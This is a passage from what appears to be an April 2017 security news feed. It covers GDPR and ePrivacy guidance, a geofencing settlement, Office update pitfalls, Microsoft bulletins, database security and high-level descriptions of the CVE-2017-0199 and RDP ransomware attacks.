In some cases you’ll have the battery backup connected to a computer via USB and receive notices that way.  But in other cases where the battery backup is protecting home entertainment equipment, your cable modem or your router, you might not know you have a problem until you happen to be home during a power hit.   Imagine how many times your equipment may have taken a hit that you didn’t know about.

The battery backup I just purchased says the battery is good for about three years.   So put it on your calendar.   If your battery backup has a visual indicator that its broken check that.   And you may want to use the software that comes with the battery backup to connect to each and manually run a self test.  (consult your own UPS manual about the best way to do that.)

The post Battery Backup PSA appeared first on Roger's Information Security Blog.

Enterprise Security Weekly #40 – Huge, Gaping Hole

Gabriel Gumbs of STEALTHbits joins us for an interview. In the news, virtualization-based security, the road to Twistlock 2.0, Trend Micro embraces machine learning, and more in this episode of Enterprise Security Weekly!Full show notes: http://wiki.securityweekly.com/wiki/index.php/ES_Episode40 Visit http://www.securityweekly.com for all the latest episodes!

Working Party Releases Guidelines on Data Protection Impact Assessments Under the GDPR

On April 4, 2017, the Article 29 Working Party (“Working Party”) adopted its draft Guidelines on Data Protection Impact Assessment and determining whether processing is “likely to result in a high risk” for the purposes of Regulation 2016/679 (the “Guidelines”). The Guidelines aim to clarify when a data protection impact assessment (“DPIA”) is required under the EU General Data Protection Regulation (“GDPR”). The Guidelines also provide criteria to Supervisory Authorities (“SAs”) to use to establish their lists of processing operations that will be subject to the DPIA requirement.

The Guidelines further explain the DPIA requirement and provide a few recommendations:

  • Scope of a DPIA. The Working Party confirms that a single DPIA may involve a single data processing operation or a set of similar processing operations (i.e., with respect to the risks they present).
  • Processing operations that are subject to a DPIA. The Working Party reiterates that a DPIA is mandatory where processing is likely to result in a high risk to the rights and freedoms of individuals. The Working Party highlights several criteria to be taken into consideration by SAs when establishing their lists of the kind of processing activities that require a DPIA, including, (1) evaluation or scoring, including profiling and predicting, (2) automated decision-making by the data controller with legal or similar significant effects on the individuals, (3) systematic monitoring of individuals, (4) processing personal data on a large scale and (5) matching or combining datasets. According to the Working Party, the more criteria that is met, the more likely that such processing activities present a high risk for the individuals and therefore require a DPIA. The assessment of certain data processing operation risks, however, must still be made on a case by case basis. The Guidelines further outline cases where a DPIA would not be required, including, for example, where the processing is not likely to result in a high risk to the rights and freedoms of individuals, or a DPIA has already been conducted for similar data processing operations. In addition, according to the Working Party, a DPIA must be reviewed periodically, and in particular, when there is a change in the risks presented by the processing operations. Finally, the Working party specifies that the DPIA requirement contained in the GDPR applies to processing operations initiated after the GDPR becomes applicable (i.e., as of May 25, 2018), although it recommends that data controllers anticipate the GDPR and carry out DPIAs for processing operations already underway.
  • How to carry out a DPIA. Where a likely high risk processing is identified, the Working Party recommends that the DPIA be carried out prior to the processing, and as early as possible in the design of the processing operation. Also, the data controller is responsible to ensure that a DPIA is carried out. The data controller must, however, cooperate with and ask the advice of the data protection officer. In addition, the data processor must assist the data controller in carrying out the DPIA when it is involved in the processing. Further, the Guidelines reiterate that data controllers have some flexibility in determining the structure and form of a DPIA. In this respect, Annex 2 of the Guidelines provides a list of criteria for data controllers to use to assess whether or not a DPIA, or a methodology to carry out a DPIA, is sufficiently comprehensive to comply with the GDPR. Finally, the Working Party recommends that data controllers publish their DPIAs, although this is not a strict requirement under the GDPR.
  • Consultation of SAs. The Working Party reiterates that data controllers must consult SAs when they cannot find sufficient measures to mitigate the risks of a processing and the residual risks are still high, as well as in specific cases where required by EU Member State law.
  • Conclusion and Recommendations. Finally, the Working Party reiterates the importance of DPIAs as a GDPR compliance tool, in particular where high risk data processing is planned or is taking place. Whenever a likely high risk processing is identified, the Working Party recommends that data controllers: (1) choose a DPIA methodology or specify and implement a systematic DPIA process, (2) provide the DPIA report to the competent SA where required, (3) consult the SA where required, (4) periodically review the DPIA and (5) document the decisions taken in the context of the DPIA.

Annex 1 of the Guidelines contains some examples of existing DPIA frameworks, including the ones published by the Spanish, French, German and UK SAs.

The Working Party will accept comments on the draft Guidelines until May 23, 2017.

Massachusetts AG Settles Geofencing Case

On April 4, 2017, the Massachusetts Attorney General’s office announced a settlement with Copley Advertising LLC (“Copley”) in a case involving geofencing.

Copley used geolocation technology to create a virtual fence around women’s reproductive healthcare facilities. Once the women crossed the virtual fence, Copley then sent targeted advertisements to the women’s phones or other mobile devices. The ads contained messages such as “Pregnancy Help” or “You Have Choices,” and linked to websites with information about alternatives to abortion. Women could also have a live chat with a “pregnancy support specialist.”

The Massachusetts AG alleged that Copley’s use of geofencing violated the Massachusetts Consumer Protection Act because it tracked consumers’ locations and disclosed them to third-party advertisers to target consumers with “potentially unwanted advertising based on inferences about [their] private, sensitive, and intimate medical or physical condition.”

The Assurance of Discontinuance requires Copley to agree to neither directly nor indirectly geofence “the [v]icinity of any Medical Center located in Massachusetts to infer the health status, medical condition or medical treatment of any person.”

In announcing the settlement, Attorney General Healey stated that “[c]onsumers are entitled to privacy in their medical decisions and conditions. This settlement will help ensure that consumers in Massachusetts do not have to worry about being targeted by advertisers when they seek medical care.”

The Twisty Maze of Getting Microsoft Office Updates

While investigating the fixes for the recent Microsoft Office OLE vulnerability, I encountered a situation that led me to believe that Office 2016 was not properly patched. However, after further investigation, I realized that the update process of Microsoft Update has changed. If you are not aware of these changes, you may end up with a Microsoft Office installation that is missing security updates. With the goal of preventing others from making similar mistakes as I have, I outline in this blog post how the way Microsoft Office receives updates has changed.

The Bad Old Days

Let's go back about 15 years in Windows computing to the year 2002. You've got a shiny new desktop with Windows XP and Office XP as well. If you knew where the option was in Windows, you could turn on Automatic Updates to download and notify you when OS updates are made available. What happens when there is a security update for Office? If you happened to know about the OfficeUpdate website, you could run an ActiveX control to check for Microsoft Office updates. Notice that the Auto Update link is HTTP instead of HTTPS. These were indeed dark times. But we had Clippy to help us through it!

officexp_clippy.png

Microsoft Update: A New Hope

Let's fast-forward to the year 2005. We now have Windows XP Service Pack 2, which enables a firewall by default. Windows XP SP2 also encourages you to enable Automatic Updates for the OS. But what about our friend Microsoft Office? As it turns out, an enhanced version of Windows Update, called Microsoft Update, was also released in 2005. The new Microsoft Update, instead of checking for updates for only the OS itself, now also checks for updates for other Microsoft software, such as Microsoft Office. If you enabled this optional feature, then updates for Microsoft Windows and Microsoft Office would be installed.

Microsoft Update in Modern Windows Systems

Enough about Windows XP, right? How does Microsoft Update factor into modern, supported Windows platforms? Microsoft Update is still supported through current Windows 10 platforms. But in each of these versions of Windows, Microsoft Update continues to be an optional component, as illustrated in the following screen shots for Windows 7, 8.1, and 10.

Windows 7

win7_windows_update.png

win7_microsoft_update.png

Once this dialog is accepted, we can now see that Microsoft Update has been installed. We will now receive updates for Microsoft Office through the usual update mechanisms for Windows.

win7_microsoft_update_installed.png

Windows 8.1

Windows 8.1 has Microsoft Update built-in; however, the option is not enabled by default.

win8_microsoft_update.png

Windows 10

Like Windows 8.1, Windows 10 also includes Microsoft Update, but it is not enabled by default.

win10_microsoft_update.png

Microsoft Click-to-Run

Microsoft Click-to-Run is a feature where users "... don't have to download or install updates. The Click-to-Run product seamlessly updates itself in the background." The Microsoft Office 2016 installation that I obtained through MSDN is apparently packaged in Click-to-Run format. How can I tell this? If you view the Account settings in Microsoft Office, a Click-to-Run installation looks like this:

office16_about.png

Additionally, you should notice a process called OfficeClickToRun.exe running:

procmon-ctr.png

Microsoft Office Click-to-Run and Updates

The interaction between a Click-to-Run version of Microsoft Office and Microsoft Updates is confusing. For the past dozen years or so, when a Windows machine completed running Microsoft Update, you could be pretty sure that Microsoft Office was up to date. As a CERT vulnerability analyst, my standard process on a Microsoft patch Tuesday was to restore my virtual machine snapshots, run Microsoft Update, and then consider that machine to have fully patched Microsoft software.

I first noticed a problem when my "fully patched" Office 2016 system still executed calc.exe when I opened my proof-of-concept exploit for CVE-2017-0199. Only after digging into the specific version of Office 2016 that was installed on my system did I realize that it did not have the April 2017 update installed, despite having completed Microsoft Update and rebooting. After setting up several VMs with Office 2016 installed, I was frequently presented with a screen like this:

office2016_no_updates_smaller.png

The problem here is obvious:

  • Microsoft Update is indicating that the machine is fully patched when it isn't.
  • The version of Office 2016 that is installed is from September 2015, which is outdated.
  • The above screenshot was taken on May 3, 2017, which shows that updates weren't available when they actually were.

I would love to have determined why my machines were not automatically retrieving updates. But unfortunately there appear to be too many variables at play to pinpoint the issue. All I can conclude is that my Click-to-Run installations of Microsoft Office did not receive updates for Microsoft Office 2016 until as late as 2.5 weeks after the patches were released to the public. And in the case of the April 2017 updates, there was at least one vulnerability that was being exploited in the wild, with exploit code being publicly available. This amount of time is a long window of exposure.

It is worth noting that the manual update button within the Click-to-Run Office 2016 installation does correctly retrieve and install updates. The problem I see here is that it requires manual user interaction to be sure that your software is up to date. Microsoft has indicated to me that this behavior is by design:

[Click-to-Run] updates are pushed automatically through gradual rollouts to ensure the best product quality across the wide variety of devices and configurations that our customers have.

Personally, I wish that the update paths for Microsoft Office were more clearly documented.

Update: April 11, 2018

Microsoft Office Click-to-Run updates are not necessarily released on the official Microsoft "Patch Tuesday" dates. For this reason, Click-to-Run Office users may have to wait additional time to receive security updates.

Conclusions and Recommendations

To prevent this problem from happening to you, I recommend that you do the following:

  • Enable Microsoft Update to ensure that you receive updates for software beyond just the core Windows operating system. This switch can be automated using the technique described here: https://msdn.microsoft.com/en-us/aa826676.aspx
  • If you have a Click-to-Run version of Microsoft Office installed, be aware that it will not receive updates via Microsoft Update.
  • If you have a Click-to-Run version of Microsoft Office and want to ensure timely installation of security updates, manually check for updates rather than relying on the automatic update capability of Click-to-Run.
  • Enterprise customers should refer to Deployment guide for Office 365 ProPlus to ensure that updates for Click-to-Run installations meet their security compliance timeframes.

Working Party Adopts Opinion on Proposed ePrivacy Regulation

On April 4, 2017, the Article 29 Working Party (the “Working Party”) adopted an Opinion on the Proposed Regulation of the European Commission for the ePrivacy Regulation (the “Proposed ePrivacy Regulation”). The Proposed ePrivacy Regulation is intended to replace the ePrivacy Directive and to increase harmonization of ePrivacy rules in the EU. A regulation is directly applicable in all EU Member States, while a directive requires transposition into national law. 

The Working Party welcomes the Proposed ePrivacy Regulation and outlines some points of concern that should be improved during the legislative process which is intended to be completed by May 2018 when the EU General Data Protection Regulation (“GDPR”) takes effect.

Key Aspects of the Proposed ePrivacy Regulation

  • Consistency with the GDPR. The Working Party welcomes the fact that the same authority responsible for monitoring compliance with the GDPR will also be responsible for the enforcement of the Proposed ePrivacy Regulation and will be able to impose similar fines. Furthermore, the Working Party favors the removal of the existing sector-specific data breach notification rules in the ePrivacy context, consistent with the GDPR’s general data breach notification rule applicable to all sectors.
  • Extended Scope. The Working Party welcomes the expansion of the Proposed ePrivacy Regulation to include Over-The-Top providers in addition to traditional telecom operators. Moreover, the Working Party favors the clarification that the Proposed ePrivacy Regulation covers machine-to-machine interaction as well as content and associated metadata. The Opinion also favors the recognition of the importance of anonymization, the broad formulation of the protection of terminal equipment and the inclusion of legal persons in the scope of the Proposed ePrivacy Regulation.
  • Consent. The Working Party welcomes the clarification that Internet access and mobile telephones are essential services and that providers of these services cannot “force” their customers to consent to any data processing unnecessary for the provision these services. According to the Working Party, given the dependence of people on these essential services, consent for the processing of their communications for additional purposes (such as for advertising and marketing purposes) is not valid. In addition, the Working Party approves that the consent requirement for the inclusion of personal data of natural persons in directories is harmonized. Finally, the Working Party appreciates that the prohibition to collect information from end-users’ terminal equipment does not apply in cases of measuring web traffic under certain conditions.

Points of Concern

  • WiFi tracking. According to the Working Party, the obligations in the Proposed ePrivacy Regulation for the tracking of the location of terminal equipment should comply with the GDPR requirements. Specifically, the Working Party notes that MAC addresses are personal data, even after security measures, such as hashing, have been implemented. Depending on the purpose of the data collection, the Working Party notes that tracking under the GDPR is likely either to be subject to consent, or may be performed if the collected personal data is anonymized (preferably immediately after collection). Finally, the Working Party invites the European Commission to promote a technical standard for mobile devices to automatically signal an objection against such tracking.
  • Analysis of content and metadata. The Working Party appreciates the recognition that metadata may reveal very sensitive data and that analysis of content is high-risk processing. According to the Working Party, it should be prohibited to process content and metadata of communications without the consent of both sender and recipient, except for specific purposes permitted by the Proposed ePrivacy Regulation, including security and billing purposes, as well as spam filtering purposes. To that end, the Working Party recommends that the Proposed ePrivacy Regulation also permit the processing of content and metadata of communications for purely household usage as well as for individual work-related usage. According to the Working Party, the analysis of content and metadata of communications for all other purposes, such as analytics, profiling, behavioral advertising or other commercial purposes, should require consent from all end-users.
  • Tracking walls. The Working Party advocates that the Proposed ePrivacy Regulation should include an explicit prohibition of tracking walls (i.e., the practice whereby access to a website or service is denied unless individuals agree to be tracked on other websites or services). According to the Working Party, such “take it or leave it” approaches are rarely legitimate. The Working Party also recommends that access to content on websites and apps should not be made conditional on the acceptance of intrusive processing activities, such as cookies, device fingerprinting, injection of unique identifiers or other monitoring techniques.
  • Privacy by default regarding terminal equipment and software. The Working Party recommends that terminal equipment and software must, by default, “offer privacy protective settings, and offer clear options to users to confirm or change these default settings during installation.” The Working Party recommends that users have the ability to provide consent through their browser settings and have the option to opt-in to Do Not Track.

The Working Party also made additional recommendations with regard to clarifying the Proposed ePrivacy Regulation’s extraterritorial scope, the conditions for obtaining granular consent through browser settings and including behavioral advertisements in the direct marketing rules. Finally, the Working Party discussed several other issues that should be clarified to ensure legal certainty, such as the conditions for the employer’s interference with company-issued devices.

Read the Opinion of the Article 29 Working Party.

Working Party Adopts Revised Guidelines on Data Portability, DPOs and Lead SA

On April 5, 2017, the Article 29 Working Party (“Working Party”) adopted the final versions of its guidelines (the “Guidelines”) on the right to data portability, Data Protection Officers (“DPOs”) and Lead Supervisory Authority (“SA”), which were first published for comment in December 2016. The final publication of these revised guidelines follows the public consultation which ended in February 2017.

The amendments and additions made to the first version of the Guidelines on DPOs include the following points:

  • pursuant to the Guidelines, a DPO, whether mandatory or voluntary, is designated for all the processing activities carried out by the data controller or the data processor;
  • to ensure the DPO’s accessibility, the Working Party recommends that the DPO be located within the EU, whether or not the controller or the processor is established in the EU;
  • the Working Party recalls that the DPO must take the role of “facilitator” and act as a contact point to provide the competent SA with the documents and information it needs for the performance of its tasks, as well as for the exercise of its investigative, corrective, authorization and advisory powers; and
  • although the DPO is bound by secrecy or confidentiality concerning the performance of its tasks, the DPO is still allowed to contact and seek advice from the SA.

The Working Party amended and further specified certain points of the Guidelines on the Lead SA, including the following:

  • Where one or more data controllers established in the EU jointly determine the purposes and means of the processing (i.e., joint controllers), the controllers must, in a transparent manner, determine their respective responsibilities with respect to compliance with the EU General Data Protection Regulation (“GDPR”) and, in order to benefit from the one-stop-shop, should designate which establishment will have the power to implement decisions about the processing with respect to all joint controllers—and act as the main establishment.
  • When the data controllership decision has been made and a main establishment has been designated, the lead SA can still rebut the controller’s analysis based on an objective analysis of the relevant facts and request further information regarding the data controllership structure.
  • The one-stop-shop system can also benefit data processors that are subject to the GDPR and have establishments in more than one EU Member State. Similar to data controllers, the processor’s main establishment will be the location of its central administration in the EU or, in case there is no central administration in the EU, the establishment in the EU where the main processing activities take place. However, where both the data controller and processor are involved, the competent lead SA should be the one to act as lead SA for the controller. Therefore, in practice, a data processor may have to deal with different lead SAs.

The Working Party amended and further specified certain points of the Guidelines on the right to data portability, including the following:

  • Data controllers answering data portability requests from data subjects are not responsible for the processing handled by the data subject or by another company receiving personal data. In this respect, the data controller is not responsible for the receiving data controller’s compliance with data protection law.
  • Data processors processing personal data subject to a data portability request must assist the data controller in responding to such requests.
  • Receiving data controllers are not obliged to accept and process personal data transmitted following a data portability request.
  • Data that is observed from the activities of the data subjects (e.g., activity logs, history of website usage or search activities) is in scope of the data portability right.
  • The Working Party recommends data controllers explore two complimentary ways to make portable data available to data subjects or other data controllers: (1) a direct transmission of the overall dataset of portable data, and (2) an automated tool allowing extraction of relevant data. The choice between these two paths must be made on a case by case basis.
  • Where there is no available common use format in a certain industry or context, data controllers should provide personal data using commonly used open formats, along with the related metadata.
  • When it comes to ensuring the security of personal data transmitted, data controllers should implement appropriate procedures to deal with potential data breaches, assess the risks linked to data portability and take appropriate risk mitigation measures (e.g., use additional authentication methods).

BrickerBot Permanent Denial-of-Service Attack (Update A)

This updated alert is a follow-up to the original alert titled ICS-ALERT-17-102-01A BrickerBot Permanent Denial-of-Service Attack that was published April 12, 2017, on the NCCIC/ICS-CERT web site. ICS-CERT is aware of open-source reports of “BrickerBot” attacks, which exploit hard-coded passwords in IoT devices in order to cause a permanent denial of service (PDoS). This family of botnets, which consists of BrickerBot.1 and BrickerBot.2, was described in a Radware Attack Report.

China Publishes Draft Measures for Security Assessments of Data Transfers

The Cybersecurity Law of China, which was passed in November of 2016, introduced a data localization requirement requiring “operators of key information infrastructure” to retain, within China, critical data and personal information which they collect or generate in the course of operating their business in China. If an entity has a genuine need resulting from a business necessity to transmit critical data or personal information to a destination outside of China, it can do so provided it undergoes a “security assessment.”

On April 11, 2017, the Cyberspace Administration of China published a draft of its proposed Measures for the Security Assessment of Outbound Transmission of Personal Information and Critical Data (the “Draft”). The Draft provides further guidance on how the security assessments might be carried out. The general public may comment on the Draft until May 11, 2017. At this point, the Draft has only been published for comment and does not constitute a final regulation. However, it represents a real possibility of what the final regulation could require.

The Draft would extend the data localization requirement from “operators of key information infrastructure” to all “network operators.” The definition of “network operator” under the Draft remains consistent with the definition given under the Cybersecurity Law, which refers to an owner or an administrator of a computerized information network system, or a network service provider. This means that all  “network operators” will also be required to store, within the territory of China, personal information and critical data which they collect or generate in the course of operating their business in China and undergo a security assessment if they have a business need to transmit data outside of China.

The Draft has divided the security assessment into two types, self-assessments and assessments conducted by the competent authority. In general, a “network operator” has to conduct a self-assessment before transmitting critical data or personal information abroad, and will remain responsible for the result of its assessment. However, a security assessment must be submitted to and conducted by the competent authority under the following circumstances: (1) the outbound data transfer involves the personal information of over 500,000 individuals; (2) the data size is over 1,000 GB; (3) the transfer involves data in relation to nuclear facilities, chemistry and biology, national defense and the military, population health, megaprojects, the marine environment or sensitive geographic information; (4) the transfer involves data relating to information about the cybersecurity of key information infrastructure, such as system vulnerabilities and security protection; (5) the outbound transfer of personal information and critical data is conducted by an operator of key information infrastructure; or (6) the outbound data transfer may affect the national security or the public interest.

“Personal information” is already defined in the Cybersecurity Law itself as information that is recorded by electronic or other methods and that can, on its own or in combination with other information, distinguish the identity of a natural person. “Critical data” is defined in the Draft as data which is very closely related to national security, economic development and the social and public interests, but the concrete scope is to be further elaborated upon in relevant national standards and separate guidance documents.

Under the Draft, a security assessment would focus on the following factors: (1) the necessity of the outbound transfer; (2) the quantity, scope, type and sensitivity of the personal information and critical data to be transferred; (3) the security measures and capabilities of the data recipient, as well as the cybersecurity environment of the nation where the data recipient is resident; (4) the risk of leakage, damage or abuse of the data after the outbound transfer; and (5) possible risks to the national security, public interests and individual’s legal rights that are involved in the outbound data transfer and data aggregation.

When transferring personal information, network operators are required to expressly explain to the data subject the purpose, scope, content, recipient and the nation where the recipient is resident, and obtain the consent of the data subject. An outbound data transfer is prohibited without the consent of a data subject, or when the transfer may infringe upon the interests of the individual. Outbound transfers of a minor’s personal information must be consented to by the minor’s guardian.

An outbound data transfer will also be prohibited if the transfer would bring risks to the security of the national political system, economy, science and technology or national defense, or if the transfer could affect national security or jeopardize the public interest.

MS16-037 – Critical: Cumulative Security Update for Internet Explorer (3148531) – Version: 2.0

Severity Rating: Critical
Revision Note: V2.0 (April 11, 2017): Bulletin revised to announce the release of a new Internet Explorer cumulative update (4014661) for CVE-2016-0162. The update adds to the original release to comprehensively address CVE-2016-0162. Microsoft recommends that customers running the affected software install the security update to be fully protected from the vulnerability described in this bulletin. See Microsoft Knowledge Base Article 4014661 for more information.
Summary: This security update resolves vulnerabilities in Internet Explorer. The most severe of the vulnerabilities could allow remote code execution if a user views a specially crafted webpage using Internet Explorer. An attacker who successfully exploited the vulnerabilities could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.

MS17-014 – Important: Security Update for Microsoft Office (4013241) – Version: 2.0

Severity Rating: Important
Revision Note: V2.0 (April 11, 2017): To comprehensively address CVE-2017-0027 for Office for Mac 2011 only, Microsoft is releasing security update 3212218. Microsoft recommends that customers running Office for Mac 2011 install update 3212218 to be fully protected from this vulnerability. See Microsoft Knowledge Base Article 3212218 for more information.
Summary: This security update resolves vulnerabilities in Microsoft Office. The most severe of the vulnerabilities could allow remote code execution if a user opens a specially crafted Microsoft Office file. An attacker who successfully exploited the vulnerabilities could run arbitrary code in the context of the current user. Customers whose accounts are configured to have fewer user rights on the system could be less impacted than those who operate with administrative user rights.

MS17-021 – Important: Security Update for Windows DirectShow (4010318) – Version: 2.0

Severity Rating: Important
Revision Note: V2.0 (April 11, 2017): Bulletin revised to announce that the security updates that apply to CVE-2017-0042 for Windows Server 2012 are now available. Customers running Windows Server 2012 should install update 4015548 (Security Only) or 4015551 (Monthly Rollup) to be fully protected from this vulnerability. Customers running other versions of Microsoft Windows do not need to take any further action.
Summary: This security update resolves a vulnerability in Microsoft Windows. The vulnerability could allow an Information Disclosure if Windows DirectShow opens specially crafted media content that is hosted on a malicious website. An attacker who successfully exploited the vulnerability could obtain information to further compromise a target system.

Layered Database Security in the age of Data Breaches

We live in a time of daily breach notifications. One recently affected organization in Germany put out a statement which said: "The incident is not attributable to security deficiencies." and "Human error can also be ruled out." They went on say that it is "virtually impossible to provide viable protection against organized, highly professional hacking attacks." It's a tough climate we find ourselves in. It  just feels too hard or impossible at times. And there's some truth to that. There are way too many potential attack vectors for comfort.

Many breaches occur in ways that make it difficult to pinpoint exactly what might have prevented it. Or, the companies involved hide details about what actually happened or how. In some cases, they lie. They might claim there was some Advanced Persistent Threat on the network when in reality, it was a simple phishing attack where credentials were simply handed over.

In one recent case, a third party vendor apparently uploaded a database file to an unsecured Amazon AWS server. A media outlet covering the story called out that it was not hacking because the data was made so easily available. Numerous checkpoints come to mind that each could have prevented or lessened the damage in this scenario. I’d like to paint a picture of the numerous layers of defense that should be in place to help prevent this type of exposure.

Layer 1: Removing Production Data
The data should have been long removed from the database.
Assuming this is a non-production database (and I sure hope it is), it should have been fully masked before it was even saved as a file. Masking data means completely removing the original sensitive data and replacing it with fake data that looks and acts real. This enables safe use of the database for app development, QA, and testing. Data can be masked as it’s exported from the production database (most secure) or in a secure staging environment after the initial export. Had this step been done, the database could safely be placed on an insecure AWS server with limited security concerns because there’s no real data. An attacker could perhaps use the DB schema or other details to better formulate an attack on the production data, so I’m not recommending posting masked databases publicly, but the risk of data loss is severely limited once the data is masked.

Layer 2: Secure Cloud Server Configuration
The researcher should never have been able to get to the file.
A security researcher poking around the web should never have been able to access this database file. Proper server configuration and access controls should prevent unauthorized access to any files (including databases). In addition to documenting proper security configuration, certain Cloud Security Access Brokers can be used to continuously monitor AWS instances to ensure that server configurations match the corporate guidelines. Any instances of configuration drift can be auto-remediated with these solutions to ensure that humans don’t accidentally misconfigure servers or miss security settings in the course of daily administration.

Layer 3: Apply Database Encryption
Even with access to the database file, the researcher should not have been able to access the data.
At-rest data encryption that is built into the database protects sensitive data against this type of scenario. Even if someone has the database file, if it were encrypted, the file would essentially be useless. An attacker would have to implement an advanced crypto attack which would take enormous resources and time to conduct and is, for all intents and purposes, impractical. Encryption is a no-brainer. Some organizations use disk-layer encryption, which is OK in the event of lost or stolen disk. However, if a database file is moved to an unencrypted volume, it is no longer protected. In-database encryption improves security because the security stays with the file regardless of where it’s moved or exported. The data remains encrypted and inaccessible without the proper encryption keys regardless of where the database file is moved.

Layer 4: Apply Database Administrative Controls
Even with administrative permissions to the database, the researcher should not have been able to access the sensitive data.
I’m not aware of similar capabilities outside of Oracle database, but Oracle Database Vault would have also prevented this breach by implementing access controls within the database. Database Vault effectively segregates roles (enforces Separation of Duties) so that even an attacker with DBA permissions and access to the database file and encryption keys cannot run queries against the sensitive application data within the database because their role does not allow it. This role-based access, enforced within the database, is an extremely effective control to avoid accidental access that may occur throughout the course of daily database administration.

Layer 5: Protect Data Within the Database
Even with full authorization to application data, highly sensitive fields should be protected within the database.
Assuming all of the other layers break down and you have full access to the unencrypted database file and credentials that are authorized to access the sensitive application data, certain highly sensitive fields should be protected via application-tier encryption. Social Security Numbers and Passwords, for example, shouldn’t be stored in plain text. By applying protection for these fields at the app layer, even fully authorized users wouldn’t have access. We all know that passwords should be hashed so that the password field is only useful to the individual user who enters their correct password. But other fields, like SSN, can be encrypted at the app layer to protect against accidental exposure (human error), intentional insider attack, or exposed credentials (perhaps via phishing attack).

Maybe the vendor didn’t follow the proper protocols instituted by the organization. Maybe they made a human error; we all make mistakes. But, that’s why a layered approach to database security is critical on any database instances where sensitive production data resides. Security protocols shouldn’t require humans to make the right decisions. They should apply security best practices by default and without option.

Assuming this was a non-production database, any sensitive data should have been fully masked/replaced before it was even made available. And, if it was a production DB, database encryption and access control protections that stay with the database during export or if the database file is moved away from an encrypted volume should have been applied. The data should have been protected before the vendor's analyst ever got his/her hands on it. Oracle Database Vault would have prevented even a DBA-type user from being able to access the sensitive user data that was exposed here. These are not new technologies; they’ve been around for many years with plentiful documentation and industry awareness.

Unfortunately, a few of the early comments I read on this particular event were declarations or warnings about how this proves that cloud is less secure than on-premises deployments. I don’t agree. Many cloud services are configured with security by default and offer far more protection than company-owned data centers. Companies should seek cloud services that enable security by default and that offer layered security controls; more security than their own data centers. It’s more than selecting the right Cloud Service Provider. You also need to choose the right service; one that matches the specific needs (including security needs) of your current project. The top CSPs offer multiple IaaS and/or PaaS options that may meet the basic project requirements. While cloud computing grew popular because it’s easy and low cost, ease-of-use and cost are not always the most important factors when choosing the right cloud service. When sensitive data is involved, security needs to be weighed heavily when making service decisions.

I'll leave you with this. Today's computing landscape is extremely complex and constantly changing. But security controls are evolving to address what has been called the extended enterprise (which includes cloud computing and user mobility among other characteristics). Don't leave security in the hands of humans. And apply security in layers to cover as many potential attack vectors as possible. Enable security by default and apply automated checks to ensure that security configuration guidelines are being followed.

Note: Some of the content above is based on my understanding of Oracle security products (encryption, masking, CASB, etc.) Specific techniques or advantages mentioned may not apply to other vendors’ similar solutions.

Fight firewall sprawl with AlgoSec, Tufin, Skybox suites

New and innovative security tools seem to be emerging all the time, but the frontline defense for just about every network in operation today remains the trusty firewall. They aren’t perfect, but if configured correctly and working as intended, firewalls can do a solid job of blocking threats from entering a network, while restricting unauthorized traffic from leaving.

The problem network administrators face is that as their networks grow, so do the number of firewalls. Large enterprises can find themselves with hundreds or thousands, a mix of old, new and next-gen models, probably from multiple vendors -- sometimes accidentally working against each other. For admins trying to configure firewall rules, the task can quickly become unmanageable.

To read this article in full, please click here

(Insider Story)

Acknowledgement of Attacks Leveraging Microsoft Zero-Day

FireEye recently detected malicious Microsoft Office RTF documents that leverage a previously undisclosed vulnerability. This vulnerability allows a malicious actor to execute a Visual Basic script when the user opens a document containing an embedded exploit. FireEye has observed several Office documents exploiting the vulnerability that download and execute malware payloads from different well-known malware families.

FireEye shared the details of the vulnerability with Microsoft and has been coordinating for several weeks public disclosure timed with the release of a patch by Microsoft to address the vulnerability. After recent public disclosure by another company, this blog serves to acknowledge FireEye’s awareness and coverage of these attacks.

FireEye email and network solutions detect the malicious documents as: Malware.Binary.Rtf.

Attack Scenario

The attack involves a threat actor emailing a Microsoft Word document to a targeted user with an embedded OLE2link object. When the user opens the document, winword.exe issues a HTTP request to a remote server to retrieve a malicious .hta file, which appears as a fake RTF file. The Microsoft HTA application loads and executes the malicious script. In both observed documents the malicious script terminated the winword.exe process, downloaded additional payload(s), and loaded a decoy document for the user to see. The original winword.exe process is terminated in order to hide a user prompt generated by the OLE2link.

The vulnerability is bypassing most mitigations; however, as noted above, FireEye email and network products detect the malicious documents. Microsoft Office users are recommended to apply the patch as soon as it is available. 

Acknowledgements

FLARE Team, FireEye Labs Team, FireEye iSIGHT Intelligence, and Microsoft Security Response Center (MSRC).

President Trump Nullifies FCC Broadband Consumer Privacy Rules

On April 3, 2017, President Trump signed a bill which nullifies the Broadband Consumer Privacy Rules (the “Rules”) promulgated by the FCC in October 2016. The Rules largely had not yet taken effect. In a statement, FCC Chairman Ajit Pai praised the elimination of the Rules, noting that, “in order to deliver that consistent and comprehensive protection, the Federal Communications Commission will be working with the Federal Trade Commission to restore the FTC’s authority to police Internet service providers’ privacy practices.”

A User-Friendly Interface for Cyber-criminals

IMG-MC-wysiwye

Installing malware through Remote Desktop Protocol is a popular attack method used by many cyber-criminals. over the past few months Panda Security’s research facility PandaLabs, has analysed several attacks of this nature.

Once credentials are obtained through brute a force attack on the RDP, the cyber-criminals gain access to the company. Attackers simply execute the corresponding malware automatically to start the encryption.

wysiwye-530x483Recently however, PandaLabs has noticed more personalised attacks. Analysing this intrusion we see that the ransomware comes with its own interface, through which its can be configured according to the attackers preferences. Starting with details such as which email address will appear in the ransom note. This customised attack makes it possible to hand-pick the devices the hackers would like to action on.

Advanced attacks we continue to see in this environment require businesses to employ a corporate network security strategy. Preventing zero-day attacks from entering your network is essential, along with efforts to neutralise and block attacks.

Data collected from Panda clients in Europe indicated that Panda Adaptive Defense 360 (AD360) was able to detect and block this particular attack. Timely investment in prevention, detection and response technology, such as AD360 guarantees better protections against new age threats.

The post A User-Friendly Interface for Cyber-criminals appeared first on CyberSafety.co.za.

Israel Passes Comprehensive Data Security and Breach Notification Regulations

Haim Ravia and Dotan Hammer of Pearl Cohen Zedek Latzer Baratz recently published an article outlining Israel’s new Protection of Privacy Regulations (“Regulations”), passed by the Knesset on March 21, 2017. The Regulations will impose mandatory comprehensive data security and breach notification requirements on anyone who owns, manages or maintains a database containing personal data in Israel.

The Regulations will become effective in late March 2018.

Read Pearl Cohen’s full article.

Hack Naked News #118 – April 4, 2017

Doug White fills in in the studio, while the awesome, sheer naked power of Jason Wood fills the airwaves. Anonymous FTP, the Russians, Skynet activates in Connecticut, and the return of Van Eck Phreaking!

Full Show Notes: http://wiki.securityweekly.com/wiki/index.php/HNNEpisode118

